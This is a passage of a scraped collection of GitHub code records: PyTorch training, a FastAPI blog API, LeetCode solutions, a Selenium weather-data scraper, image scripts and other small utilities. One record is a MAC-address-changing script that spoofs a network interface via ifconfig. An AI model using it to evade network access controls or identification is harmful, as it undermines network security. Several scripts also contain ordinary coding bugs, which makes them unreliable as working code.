데이터셋을 for 구문에서 돌림.\r\n\r\n model = CNN() #모델 정의\r\n\r\n\r\n criterion = nn.CrossEntropyLoss() #Loss 설정 (크로스엔트로피)\r\n\r\n optim = torch.optim.Adam(model.parameters(), lr=0.001) # weight_new = weight_old - weight_gradient * lr\r\n\r\n if os.path.isfile(\"./weight_dict.pt\"): # weight_dict.pt 파일이 있으면 True 리턴\r\n model_dict = torch.load('./weight_dict.pt')['mdoel_weight'] # 학습 weight 불러오기 ( model )\r\n model.load_state_dict(model_dict) # 모델 weight 갱신\r\n adam_dict = torch.load('./weight_dict.pt')['adam_weight'] # 학습 weight 불러오기 ( optimizer )\r\n optim.load_state_dict(adam_dict) # adam optimizer weight 갱신\r\n\r\n list_loss = [] # Loss값을 받을 리스트 선언\r\n list_acc = [] # accuracy값을 받을 리스트 선언\r\n for epoch in range(1): # 학습 epoch값 설정\r\n for input, label in tqdm(data_loader): # 데이터 불러오기 (batchsize = 32)\r\n # label 32\r\n output = model(input) # 32x10\r\n loss = criterion(output, label) # 1\r\n\r\n optim.zero_grad() #optimizer를 이용하여 weight들의 gradient 초기화\r\n loss.backward() # loss값에 따른 gradient 전달\r\n optim.step() #optimizer를 통한 weight 갱신\r\n list_loss.append(loss.detach().item()) #loss값 저장\r\n\r\n n_correct_answers = torch.sum(torch.eq(torch.argmax(output, dim=1), label)).item() # output과 label 맞는 개수 확인\r\n print(\"Accuracy: \", n_correct_answers / 32.0 * 100) # accuracy값 print\r\n list_acc.append(n_correct_answers / 32.0 * 100) # accuracy값 저장\r\n\r\n\r\n\r\n weight_dict = {'model_weight': model.state_dict(), 'adam_weight': optim.state_dict()} # 저장시��� 가중치 정의\r\n torch.save(weight_dict, \"./weight_dict.pt\") #훈련된 weight 저장\r\n\r\n\r\n plt.plot(list_loss) #plot할 데이터 (loss)\r\n plt.plot(list_acc) # plot할 데이터 (accuracy)\r\n\r\n plt.xlabel(\"Iteration\") # x축 정의\r\n plt.ylabel(\"Loss\") # y축 정의\r\n plt.show() # 결과 
plot하기\r\n","repo_name":"Seungheon-Shin/DeepLearning_Bootcamp_with_pytorch","sub_path":"CNN/CNN_train.py","file_name":"CNN_train.py","file_ext":"py","file_size_in_byte":3768,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"11514164143","text":"from fastapi import Depends, status, HTTPException\nfrom sqlalchemy.orm import Session\nfrom .. import schemas, models, db\n\ndef getBlogs(db: Session = Depends(db.get_db)):\n blogs = db.query(models.Blog).all()\n return blogs\n\n\ndef getBlog(id: int, db: Session = Depends(db.get_db)):\n blog = db.query(models.Blog).filter(models.Blog.id == id).first()\n if not blog:\n raise HTTPException(status_code = status.HTTP_404_NOT_FOUND,\n detail = f'Blog with the id of {id} is not available'\n )\n return blog\n\n\ndef addBlog(blog: schemas.Blog, db: Session = Depends(db.get_db)):\n newBlog = models.Blog(title = blog.title, body = blog.body, user_id = 1)\n db.add(newBlog)\n db.commit()\n db.refresh(newBlog)\n return newBlog\n\n\ndef putBlog(id: int, blog: schemas.Blog, db: Session = Depends(db.get_db)):\n blog = db.query(models.Blog).filter(models.Blog.id == id)\n if not blog.first():\n raise HTTPException(status_code = status.HTTP_404_NOT_FOUND,\n detail = f'Blog with the id of {id} is not available'\n )\n blog.update({'title' : blog.title, 'body' : blog.body})\n db.commit()\n return {'detail' : f'Blog with the id of {id} is updated'}\n\n\ndef deleteBlog(id: int, db: Session = Depends(db.get_db)):\n blog = db.query(models.Blog).filter(models.Blog.id == id)\n if not blog.first():\n raise HTTPException(status_code = status.HTTP_404_NOT_FOUND,\n detail = f'Blog with the id of {id} is not available'\n )\n blog.delete(synchronize_session = False)\n db.commit()\n return {'detail' : f'Blog with the id of {id} is 
deleted'}","repo_name":"Yoo-Joo/FastAPI-Blog","sub_path":"blog/repository/blog.py","file_name":"blog.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"5831278043","text":"'''\n\n给你一个有 n 个节点的 有向无环图(DAG),请你找出所有从节点 0 到节点 n-1 的路径并输出(不要求按特定顺序)\n\n二维数组的第 i 个数组中的单元都表示有向图中 i 号节点所能到达的下一些节点,空就是没有下一个结点了。\n\n译者注:有向图是有方向的,即规定了 a→b 你就不能从 b→a 。\n\n\n示例 1:\n\n输入:graph = [[1,2],[3],[3],[]]\n输出:[[0,1,3],[0,2,3]]\n解释:有两条路径 0 -> 1 -> 3 和 0 -> 2 -> 3\n\n示例 2:\n\n输入:graph = [[4,3,1],[3,2,4],[3],[4],[]]\n输出:[[0,4],[0,3,4],[0,1,3,4],[0,1,2,3,4],[0,1,4]]\n\n示例 3:\n\n输入:graph = [[1],[]]\n输出:[[0,1]]\n\n示例 4:\n\n输入:graph = [[1,2,3],[2],[3],[]]\n输出:[[0,1,2,3],[0,2,3],[0,3]]\n\n示例 5:\n\n输入:graph = [[1,3],[2],[3],[]]\n输出:[[0,1,2,3],[0,3]]\n\n提示:\n\nn == graph.length\n2 <= n <= 15\n0 <= graph[i][j] < n\ngraph[i][j] != i(即,不存在自环)\ngraph[i] 中的所有元素 互不相同\n保证输入为 有向无环图(DAG)\n'''\nfrom queue import Queue\nfrom typing import List\n\nfrom leetcode.tools.time import printTime\n\n\nclass Solution:\n @printTime()\n def allPathsSourceTarget(self, graph: List[List[int]]) -> List[List[int]]:\n n = len(graph)\n ret = []\n q = Queue()\n q.put([0])\n while not q.empty():\n route = q.get()\n cur = route[-1]\n if cur == n - 1:\n ret.append(route)\n continue\n for g in graph[cur]:\n if g not in route:\n t = route.copy()\n t.append(g)\n q.put(t)\n return ret\n\ngraph = [[1,2,3],[2],[3],[]]\nSolution().allPathsSourceTarget(graph)","repo_name":"CrzRabbit/Python","sub_path":"leetcode/0797_M_所有可能的路径.py","file_name":"0797_M_所有可能的路径.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"31689045694","text":"\nimport selenium.webdriver as wd\nimport time\nfrom selenium.webdriver.common.keys import Keys\n\nchrome_options = 
wd.ChromeOptions()\nchrome_options.add_argument(\"--incognito\")\nchrome_options.add_argument(\"--start-maximized\")\n\nbrowser = wd.Chrome(chrome_options = chrome_options)\n\nbrowser.get('https://www.longpaddock.qld.gov.au/silo/')\n\nchoice = input('point-data?')\n\nif int(choice) == 1:\n browser.get('https://www.longpaddock.qld.gov.au/silo/point-data/')\n\nsearch_bars = browser.find_elements_by_xpath('//*[@placeholder = \"dd/mm/yyyy\"]')\n\nsearch_bars\n\nstart_date = input('Start date in dd/mm/yyyy format: ')\n\n# entering in the start date field\nsearch_bars[0].send_keys(start_date)\n\nend_date = input('End date in dd/mm/yyyy format: ')\n\n# entering in the end date field\nsearch_bars[1].clear()\nsearch_bars[1].send_keys(Keys.CONTROL + \"a\")\nsearch_bars[1].send_keys(Keys.DELETE)\nsearch_bars[1].send_keys(end_date)\n\nradios = browser.find_elements_by_class_name('radio')\n\nradios[5].click()\n\nsearch_bars = browser.find_elements_by_xpath('//*[@placeholder = \"export_120416\"]')\n\nsearch_bars[0].send_keys('export1')\n\nsearch_bars[0].send_keys(Keys.ENTER)\n\n\nsearch_bars = browser.find_elements_by_xpath('//*[@placeholder = \"Search on station name, station number or decimal latitude/longitude e.g. 
-27.63,152.71\"]')\n\n\nsearch_bars[0].send_keys('4001')\n\nsearch_bars[0].send_keys(Keys.ENTER)\n\n\na = browser.find_elements_by_id('statioSelectSubmit')\n\na[0].click()\n\n\ntime.sleep(3)\n\nbrowser.quit()\n\n\n\n\n\n","repo_name":"KudoS1410/AustraliaRain","sub_path":"webout.py","file_name":"webout.py","file_ext":"py","file_size_in_byte":1486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"39742238494","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom PIL import Image, ImageFilter, ImageDraw, ImageFont\nimport random\n\nim = Image.open('lena.jpg')\nprint(im.size)\nw, h = im.size\nim.thumbnail((w // 2, h // 2))\nim.save('lena_thumb.jpg', 'jpeg')\n\nim2 = im.filter(ImageFilter.BLUR)\nim2.save('lena_blur.jpg', 'jpeg')\n\n\ndef rand_bg():\n return random.randint(64, 255), random.randint(64, 255), random.randint(64, 255)\n\n\ndef rand_fg():\n return random.randint(32, 127), random.randint(32, 127), random.randint(32, 127)\n\n\nwidth = 260\nheight = 80\nimage = Image.new('RGB', (width, height), (255, 255, 255))\nfont = ImageFont.truetype('arial.ttf', 36)\ndraw = ImageDraw.Draw(image)\nfor x in range(width):\n for y in range(height):\n draw.point((x, y), fill=rand_bg())\nfor t in range(4):\n draw.text((60 * t + 10, 10), chr(random.randint(ord('a'), ord('z'))), font=font, fill=rand_fg())\nimage.save('rand.jpg', 'jpeg')\n","repo_name":"ArisQ/learn-python","sub_path":"46_pillow/pillow.py","file_name":"pillow.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"29106799119","text":"#!/usr/bin/env python3\n\nimport subprocess\nimport optparse\nimport re\n\n\ndef get_arguments():\n parser = optparse.OptionParser()\n parser.add_option(\"-i\", \"--interface\", dest=\"interface\", help=\"Interface to change its MAC address\")\n parser.add_option(\"-m\", \"--mac\", dest=\"new_mac\", help=\"New MAC 
address\")\n options, arguments = parser.parse_args()\n if not options.interface:\n parser.error(\"[-] Please specify an interface, use --help for more info.\")\n if not options.new_mac:\n parser.error(\"[-] Please specify a new mac, use --help for more info.\")\n return options\n\ndef change_mac(i, new_mac):\n mac_address = re.search(r\"([0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2}\", new_mac)\n \n if(mac_address):\n subprocess.call([\"ifconfig\", i, \"down\"])\n subprocess.call([\"ifconfig\", i, 'hw', 'ether', new_mac])\n subprocess.call([\"ifconfig\", i, \"up\"])\n else: \n print(\"[-] Could not change MAC address. Make sure to type the correct format\")\n \n\ndef get_current_mac(interface):\n ifconfig_result = subprocess.check_output(['ifconfig', interface])\n mac_address_search_result = re.search(r\"([0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2}\", ifconfig_result)\n \n if(mac_address_search_result):\n return mac_address_search_result.group(0)\n else: \n print(\"[-] Could not read MAC address.\")\n\n# Input collector\noptions = get_arguments()\n\n# Get Existing Mac\ncurrent_mac = get_current_mac(options.interface)\nprint(\"current Mac = \" + str(current_mac))\n\n# Update New Mac\nchange_mac(options.interface, options.new_mac)\ncurrent_mac = get_current_mac(options.interface)\nif current_mac==options.new_mac:\n print(\"[+] MAC address was successfully changed to ==> \" + current_mac)\nelse:\n print(\"[-] MAC address did not get changed\")\n\n\n","repo_name":"Sommysab/MAC-CHANGER","sub_path":"mac_changer.py","file_name":"mac_changer.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"15396232266","text":"produkty = {'pomidor': 10, 'jablko': 11, 'banan': 4}\nmagazyn = {'pomidor': 15, 'jablko': 20, 'banan': 40}\n\ndo_zaplaty = 0\n# wypisanie dostepnych produktow dla uzytkwoniak\nwhile True:\n print(\"-\" * 40)\n print('Nasza zielnik oferuje: ')\n for produkt in produkty:\n print(f' - 
{produkt} - {produkty[produkt]} PLN')\n\n komenda = input(\"Co chcesz zrobic: [k]upic, [d]odać, [koniec] by przerwac zakupy: \")\n if komenda == 'koniec':\n break\n produkt_wybrany = input('co chesz kupic?: ')\n\n if produkt_wybrany not in produkty:\n print(\"Nie mamy takiego produktu!\")\n continue\n\n waga = float(input(f'ile chcesz kupic [{produkt_wybrany}]: '))\n if magazyn[produkty_wybrany] < waga:\n print(f'Mamy za mało {produkt_wybrany}, pozostalo {magazyn[produkt_wybrany]} kg')\n continue\n magazyn[produkt_wybrany] = magazyn[produkt_wybrany] - waga\n cena = produkty[produkt_wybrany]\n koszt = waga * cena\n do_zaplaty += koszt\n\n\nprint(\"-\" * 40)\nprint(f'za zakupy zaplacisz: {do_zaplaty}')","repo_name":"ArturoWest/pythonbootcamp","sub_path":"zjazd_2/zadanie_8_rozbudowa.py","file_name":"zadanie_8_rozbudowa.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"18039025365","text":"'''\nCreated on 2 mars 2015\n\n@author: mathieu.rosser\n'''\n\n# http://stackoverflow.com/questions/20259025/module-object-has-no-attribute-drawmatches-opencv-python\n\nimport cv2\nfrom find_obj import filter_matches,explore_match\n\ndef manage_frame(img1, img2):\n # Initiate SIFT detector\n orb = cv2.SIFT()\n \n # find the keypoints and descriptors with SIFT\n kp1, des1 = orb.detectAndCompute(img1,None)\n kp2, des2 = orb.detectAndCompute(img2,None)\n \n # create BFMatcher object\n bf = cv2.BFMatcher(cv2.NORM_HAMMING)#, crossCheck=True)\n \n matches = bf.knnMatch(des1, trainDescriptors = des2, k = 2)\n p1, p2, kp_pairs = filter_matches(kp1, kp2, matches)\n try:\n explore_match('find_obj', img1,img2,kp_pairs)#cv2 shows image\n except:\n pass\n\nimg1 = cv2.imread('NewTerrain.png',0) # queryImage\nimg2 = cv2.imread('selectivePanorama.jpg',0) # trainImage\n\ncap = cv2.VideoCapture(\"../video/balancier_motifComplexe.mp4\")\n\nwhile cap.isOpened():\n ret, frame = cap.read()\n \n if 
frame is None:\n break\n \n img1 = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n manage_frame(img2, img1)\n \n cv2.imshow('frame', img1)\n \n if cv2.waitKey(20) & 0xFF == ord('q'):\n break\n\n \ncv2.waitKey()\ncv2.destroyAllWindows()\n","repo_name":"ChristopheBolinhas/Balancier","sub_path":"balancier/exemple1.py","file_name":"exemple1.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"73473741894","text":"\"\"\"\nCalculate front length scale at wall.\nUsage:\n front_length.py ... [--output=]\n\n\"\"\"\n\nimport h5py\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pathlib\nfrom docopt import docopt\nfrom dedalus.tools import logging\nfrom dedalus.tools import post\nfrom dedalus.tools.parallel import Sync\n\nplt.style.use('prl')\n\ndef calc_front(filename, start, count, output=None):\n\n filename = pathlib.Path(filename)\n stem = filename.stem.split(\"_\")[0]\n dpi = 150\n savename_func = lambda write: '{}_{:06}.png'.format(stem, write)\n # Layout\n\n fig = plt.figure(figsize=(10,5.5))\n axes = fig.add_axes([0.1, 0.1, 0.8, 0.8])\n cax = fig.add_axes([0.1,0.9,0.2,0.02])\n axes.set_xlabel(r'$k_x$')\n axes.set_ylabel(r'$z$')\n\n with h5py.File(filename,mode='r') as file:\n img = axes.imshow(np.zeros_like(file['tasks/Temperature(y=+1)'][0,:,:,0]))\n cbar = fig.colorbar(img, cax=cax,orientation='horizontal')\n\n for index in range(start, start+count):\n temp = file['tasks/Temperature(y=+1)'][index,:,:,0]\n c_temp = np.fft.rfft(temp,axis=1)\n power = (c_temp * c_temp.conj()).real\n log_power = np.log10(power)\n\n vmin = np.nanmin(log_power)\n vmax = np.nanmax(log_power)\n if vmin == -np.inf:\n vmin = vmax-16\n print(\"vmin, vmax = {},{}\".format(vmin,vmax))\n img.set_data(log_power)\n cbar.mappable.set_clim(vmin=vmin,vmax=vmax)\n cbar.set_ticks([vmin,vmax])\n cax.xaxis.tick_top()\n cax.xaxis.set_label_position('top')\n\n savename = 
savename_func(file['scales/write_number'][index])\n savepath = output.joinpath(savename)\n fig.savefig(str(savepath), dpi=dpi)\n plt.close(fig)\n\nargs = docopt(__doc__)\noutput_path = pathlib.Path(args['--output']).absolute()\n# Create output directory if needed\nwith Sync() as sync:\n if sync.comm.rank == 0:\n if not output_path.exists():\n output_path.mkdir()\npost.visit_writes(args[''], calc_front, output=output_path)\n \n","repo_name":"jsoishi/wall_modes_topology","sub_path":"python/front_length.py","file_name":"front_length.py","file_ext":"py","file_size_in_byte":2107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"40774625605","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Author : Rock Wayne \n# @Created : 2020-05-31 08:00:00\n# @Last Modified : 2020-05-31 08:00:00\n# @Mail : lostlorder@gmail.com\n# @Version : alpha-1.0\n\"\"\"\n# 实现函数 ToLowerCase(),该函数接收一个字符串参数 str,并将该字符串中的大写字母转换成小写字母,之后返回新的字符串。 \n# \n# \n# \n# 示例 1: \n# \n# \n# 输入: \"Hello\"\n# 输出: \"hello\" \n# \n# 示例 2: \n# \n# \n# 输入: \"here\"\n# 输出: \"here\" \n# \n# 示例 3: \n# \n# \n# 输入: \"LOVELY\"\n# 输出: \"lovely\"\n# \n# Related Topics 字符串\n\n\"\"\"\nimport string\n\nimport pytest\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\nclass Solution:\n\n def toLowerCase(self, str: str) -> str:\n delta = ord(\"a\") - ord(\"A\")\n ans = \"\"\n for char in str:\n if char in string.ascii_uppercase:\n ans += chr(ord(char) + delta)\n else:\n ans += char\n return ans\n\n\n# leetcode submit region end(Prohibit modification and deletion)\n\n@pytest.mark.parametrize(\"args,expected\", [\n (\"Hello\", \"hello\"),\n (\"here\", \"here\"),\n (\"LOVELY\", \"lovely\"),\n])\ndef test_solutions(args, expected):\n assert Solution().toLowerCase(args) == expected\n\n\nif __name__ == '__main__':\n pytest.main([\"-q\", \"--color=yes\", \"--capture=no\", 
__file__])\n","repo_name":"Wang-Yann/LeetCodeMe","sub_path":"python/_0501_1000/0709_to-lower-case.py","file_name":"0709_to-lower-case.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"26603250909","text":"import sys\nimport os\nimport shutil\n\n\"\"\"\nhelper utilit: move a more compact trained model to permanent storage\n\"\"\"\n\ndef main():\n src = sys.argv[1]\n dst = sys.argv[2]\n \n if src.endswith('/'):\n src = src[:-1]\n \n _, dirname = os.path.split(src)\n \n files = os.listdir(src)\n \n assert not os.path.isdir(os.path.join(dst, dirname))\n \n os.mkdir(os.path.join(dst, dirname))\n \n for file in files:\n can_copy = True\n try:\n epoch = int(file)\n can_copy = False\n except:\n pass\n \n if file.startswith('model') or file.startswith('checkpoint'):\n if 'boids' not in dirname:\n can_copy = False\n \n if file == '__pycache__':\n can_copy = False\n \n if not can_copy:\n continue\n \n if os.path.isdir(os.path.join(src, file)):\n shutil.copytree(os.path.join(src, file), os.path.join(dst, dirname, file))\n else:\n shutil.copyfile(os.path.join(src, file), os.path.join(dst, dirname, file))\n \nif __name__ == '__main__':\n main()","repo_name":"yyuting/learning_from_program_trace","sub_path":"mv_model_result.py","file_name":"mv_model_result.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"44"} +{"seq_id":"28191316797","text":"import folium as folium\nfrom django.http import HttpResponse, HttpResponseRedirect, HttpResponsePermanentRedirect, HttpRequest\nimport typing as t\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.contrib.auth.decorators import login_required\nfrom geopy import Nominatim\n\nfrom .forms import AddMemoryForm\nfrom .models import Memory\n\n\ndef login(request: HttpRequest) -> HttpResponse:\n return render(request, 
'login.html')\n\n\n@login_required\ndef home(request: HttpRequest) -> HttpResponse:\n m = folium.Map(width=1250, height=750, location=[56.8334, 60.5984])\n memories = Memory.objects.filter(user=request.user)\n if memories:\n for memory in memories:\n geolocator = Nominatim(user_agent='Mozilla/5.0')\n location = geolocator.geocode(memory.location)\n folium.Marker(\n [location.latitude, location.longitude],\n popup=str(memory.title.encode(\"unicode_escape\").decode()),\n icon=folium.Icon(color='blue', icon='info-sign')\n ).add_to(m)\n map = m._repr_html_()\n return render(request, 'home.html', {'memories': memories, 'map': map})\n\n\n@login_required\ndef add_memory(request: HttpRequest) -> HttpResponse:\n if request.method == 'POST':\n form = AddMemoryForm(request.POST)\n if form.is_valid():\n memory = form.save(commit=False)\n memory.user = request.user\n memory.save()\n return redirect('home')\n\n m = folium.Map(width=1250, height=750, location=[56.8334, 60.5984])._repr_html_()\n form = AddMemoryForm()\n return render(request, 'add_memory.html', {'form': form, 'map': m})\n\n\n@login_required\ndef delete_memory(request: HttpRequest, memory_id: int) -> t.Union[HttpResponseRedirect, HttpResponsePermanentRedirect]:\n memory = get_object_or_404(Memory, id=memory_id)\n memory.delete()\n return redirect('home')\n","repo_name":"KonovalovaMarina/Places-Remember","sub_path":"places_remember/memories/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"4033537595","text":"## Script (Python) \"guard_protocolla\"\n##bind container=container\n##bind context=context\n##bind namespace=\n##bind script=script\n##bind subpath=traverse_subpath\n##parameters=state_change\n##title=\n##\nfrom Products.CMFCore.utils import getToolByName\n\ndoc = state_change.object\ndb = doc.getParentDatabase()\n\n#Script personalizzato se esiste\nscriptName=script.id\n\nif 
scriptName in db.resources.keys():\n return db.resources[scriptName](doc)\n\nif doc.wf_getInfoFor('review_state') == 'avvio':\n return True\nelse:\n isIstruttore = doc.verificaRuolo('iol-reviewer') or doc.verificaRuolo('iol-manager')\n return not doc.getItem('numero_protocollo','') and isIstruttore\n","repo_name":"gisweb/gisweb.iol","sub_path":"src/gisweb/iol/profiles/default/workflows/iol_workflow/scripts/guard_protocolla.py","file_name":"guard_protocolla.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"44"} +{"seq_id":"74124906053","text":"#!/usr/bin/env python3\n\nimport aiger\nimport os\nimport sys\n\nfrom statistics import mean\n\n\ndef scanBenchmarks(inputRoot):\n latchNames = set()\n skipped = []\n stats = []\n for d in os.walk(inputRoot):\n root = d[0]\n for fileName in os.listdir(root):\n if fileName.endswith(\".aag\"):\n fullName = os.path.join(root, fileName)\n try:\n aig = aiger.load(fullName)\n except Exception as err:\n skipped.append(tuple([fullName, err]))\n latches = aig.latches\n stats.append(len(latches))\n latchNames.update([s.lower() for s in latches])\n for (f, e) in skipped:\n print(f\"Warning, skipped benchmark {fullName}\", file=sys.stderr)\n # print(err)\n print(f\"min={min(stats)}, mean={mean(stats)}, max={max(stats)}\")\n return frozenset(latchNames)\n\n\ndef printLatchNames(latchNames, fname):\n out = open(fname, \"w\")\n for latch in latchNames:\n out.write(f\"{latch}\\n\")\n out.close()\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) != 3:\n print(\"Two positional arguments expected: \"\n \"(1) the path to the root of the benchmark directories\"\n \"(2) the full path of the file where you want latch names\",\n file=sys.stderr)\n exit(1)\n else:\n latchNames = scanBenchmarks(sys.argv[1])\n printLatchNames(latchNames, sys.argv[2])\n 
exit(0)\n","repo_name":"gaperez64/gnns","sub_path":"src/datainfo.py","file_name":"datainfo.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"24621100205","text":"import argostranslate.package\r\nimport argostranslate.translate\r\nimport socket\r\nimport os\r\nimport os.path\r\nimport libretranslatepy as lt\r\nfrom langdetect import detect\r\nfrom libretranslatepy import LibreTranslateAPI\r\n\r\n# Idiomas para traducción sin conexión\r\ningles = \"en\"\r\nespañol = \"es\"\r\n# Función para intentar realizar una conexión a internet\r\ndef check_internet():\r\n try:\r\n # Intenta conectar con un host de confianza\r\n socket.create_connection((\"www.google.com\", 80))\r\n \r\n return True\r\n except OSError:\r\n pass\r\n return False\r\n\r\n# Comprobación de conexión\r\nif check_internet():\r\n # Una vez comprobado si hay conexión: si el programa se ejecuta por primera vez tendremos que descargar\r\n # los modelos de traduccion, pero si ya se ha ejecutado no sera necesario\r\n # por lo que realizaremos una comprobación con un archivo de texto\r\n filename = 'ejecutado.txt'\r\n\r\n if not os.path.isfile(filename):\r\n # La descarga se ejecutará solo si el archivo no existe\r\n argostranslate.package.update_package_index()\r\n available_packages = argostranslate.package.get_available_packages()\r\n package_to_install = next(\r\n filter(\r\n lambda x: x.from_code == ingles and x.to_code == español, available_packages\r\n )\r\n )\r\n argostranslate.package.install_from_path(package_to_install.download())\r\n \r\n with open(filename, 'w') as f:\r\n f.write('ejecutado')\r\n \r\n texto = \"Hello World\"\r\n # Detecta el idioma del texto\r\n idioma_origen = detect(texto)\r\n # Traduce el texto a español \r\n traductor = LibreTranslateAPI('https://libretranslate.org/')\r\n texto_traducido = traductor.translate(texto, idioma_origen, español)\r\n print(f\"Texto traducido con 
conexion: {texto_traducido}\")\r\n # '¡Hola Mundo!' \r\nelse:\r\n # Si no se cuenta con conexion se hace uso de argos para la traducción\r\n texto = \"Hello World\"\r\n # Detecta el idioma del texto\r\n idioma_origen = detect(texto)\r\n # Si el idioma detectado correspone a los modelos descargados, se realizara la traducción\r\n if idioma_origen == ingles:\r\n translatedText = argostranslate.translate.translate(texto, ingles, español)\r\n print(f\"Texto traducido sin conexion: {translatedText}\")\r\n # '¡Hola Mundo!'\r\n else:\r\n print(\"No se cuenta con ese idioma para traduccion offline\") \r\n\r\n\r\n\r\n","repo_name":"AngelAlanis/ai-aztech","sub_path":"traductorOn-Off.py","file_name":"traductorOn-Off.py","file_ext":"py","file_size_in_byte":2457,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"75138462213","text":"def main():\n i = 0\n while True:\n # input\n num = int(input())\n i += 1\n\n # output\n if num != 0:\n ans = 'Case ' + str(i) + ': ' + str(num)\n print(ans)\n else:\n exit()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"fumiyanll23/aoj","sub_path":"ITP1/3/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"72318435653","text":"from flask import Flask, g, request, jsonify\nimport sqlite3\nimport pexpect\nimport word_processing\nimport math\nfrom gensim.models.doc2vec import Doc2Vec\n\nDATABASE = 'subtitles.db'\n\nindex = pexpect.spawn('./search')\ncolumn_len = len(open('data/documents.txt', 'r').read().splitlines())\ndocument_freq = {j.split(\"\\t\")[0] : int(j.split(\"\\t\")[1]) for j in open('data/document_freq.txt', 'r').read().splitlines()}\nmax_freq = {j.split(\"\\t\")[0] : int(j.split(\"\\t\")[1]) for j in open('data/max_freq.txt', 'r').read().splitlines()}\n\ndef search(query):\n counts = word_processing.GetCounts(query)\n args = \"\"\n for term, 
freq in counts.items():\n if term in max_freq:\n weight = (int(freq)/max_freq[term])*math.log2(column_len/document_freq[term])\n args += f\"{term} {weight} \"\n if args == \"\":\n return []\n index.sendline(args)\n index.expect(\"\\n\", timeout=None); index.expect(\"\\n\")\n return list(map(int, str(index.before)[2:-3].strip().split(\" \")))\n\n\ni2documents = { i : int(j) for i, j in enumerate(open('data/documents.txt', 'r').read().splitlines()) }\ndoc2vec_model = Doc2Vec.load(\"models/doc2vec.model\")\n\ndef doc2vecSearch(query):\n vec = doc2vec_model.infer_vector(word_processing.Tokenize(query, True))\n res = doc2vec_model.dv.most_similar([vec], topn=50)\n return [i2documents[i] for i, _ in res]\n\napp = Flask(__name__)\n\ndef make_dicts(cursor, row):\n return dict((cursor.description[idx][0], value) for idx, value in enumerate(row))\n\ndef get_db():\n db = getattr(g, '_database', None)\n if db is None:\n db = g._database = sqlite3.connect(DATABASE)\n db.row_factory = make_dicts\n return db\n\n@app.teardown_appcontext\ndef close_connection(exception):\n db = getattr(g, '_database', None)\n if db is not None:\n db.close()\n\n@app.route(\"/\")\ndef hello_world():\n return open('index.html').read()\n\n@app.route(\"/movies\")\ndef Movies():\n query = request.args.get('query')\n doc2vec = request.args.get('doc2vec')\n if query == \"\" or query == None:\n return \"[]\"\n\n if doc2vec == \"true\":\n ids = doc2vecSearch(query)\n else:\n ids = search(query)\n \n if ids == []:\n return \"[]\"\n \n i_ids = {j:i for i, j in enumerate(ids)}\n movies = get_db().execute('SELECT * FROM OpenSubtitles WHERE IDSubtitle IN '+str(tuple(ids))).fetchall()\n movies = sorted(list(movies), key=lambda x: i_ids[x['IDSubtitle']])\n return jsonify(movies)\n\napp.run()","repo_name":"uel/MovieSearch","sub_path":"webserver.py","file_name":"webserver.py","file_ext":"py","file_size_in_byte":2463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} 
+{"seq_id":"20186578884","text":"import pandas as pd\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler\n\n\nclass Scaling:\n def scaling(self, x_training, x_testing, method):\n # print(\"Scaling training and test set features\")\n\n if method == \"zscore\" or method == \"default\":\n # Feature Scaling - Z-Score Normalization\n scaler = StandardScaler()\n\n x_training = scaler.fit_transform(x_training)\n x_testing = scaler.transform(x_testing)\n\n else:\n # Feature Scaling - Min-Max Scaling\n scaler = MinMaxScaler()\n\n x_training = scaler.fit_transform(x_training)\n x_testing = scaler.transform(x_testing)\n\n return scaler, x_training, x_testing\n","repo_name":"CicaMatt/Sentry","sub_path":"components/feature_scaling.py","file_name":"feature_scaling.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"36941488587","text":"import serial\nimport os\nimport subprocess\nfrom time import sleep, time\nimport threading\nfrom evdev import 